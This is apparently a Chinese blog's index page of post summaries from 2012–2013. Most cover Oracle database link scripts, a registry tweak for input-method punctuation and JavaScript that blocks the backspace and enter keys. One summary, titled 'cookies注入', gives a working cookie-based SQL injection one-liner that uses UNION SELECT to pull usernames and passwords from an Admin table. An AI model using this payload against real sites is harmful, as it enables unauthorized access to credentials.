摘要:木有权限或是去掉oracle文件Store:Schema="SPDWEBDEMO"的属性解决。 阅读全文
输入法圆角半角问题
2013-01-28 12:26 by Lie to me, 223 阅读, 0 推荐, 收藏,
摘要:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\\Software\\Microsoft\\CTF\\TIP\\{F3BA9074-6C7E-11D4-97FA-0080C882687E}\\LanguageProfile\\0x00000804\\{F3BA9077-6C7E-11D4-97FA-0080C882687E}]\"Enable\"=dword:00000000当键值为dword:00000000的时候,默认为全角标点。当键值为dword:00000001的时候,默认为半角标点。 阅读全文
cookies注入
2013-01-19 01:44 by Lie to me, 142 阅读, 0 推荐, 收藏,
摘要:javascript:alert(document.cookie="id=188"+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin")) 阅读全文
ORA-24777: use of non-migratable database link not allowed
2013-01-11 13:35 by Lie to me, 1238 阅读, 0 推荐, 收藏,
摘要:/*oracle通用share远程连接其他用户数据库的dblink脚本*/create SHARED PUBLIC database link linkname connect to name identified by password AUTHENTICATED BY name IDENTIFIED BY passwordusing '(DESCRIPTION =(ADDRESS_LIST =(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.99.144)(PORT = 1521)))(CONNECT_DATA =(SERVER = DEDICA 阅读全文
mark
2012-12-24 17:57 by Lie to me, 115 阅读, 0 推荐, 收藏,
摘要:禁用退格键页面回退 document.onkeydown=function(){if(event.keyCode==8)return false;};文本框禁用回车键 onkeypress="if(event.keyCode==13||event.which==13){return false;}" 阅读全文
浙公网安备 33010602011771号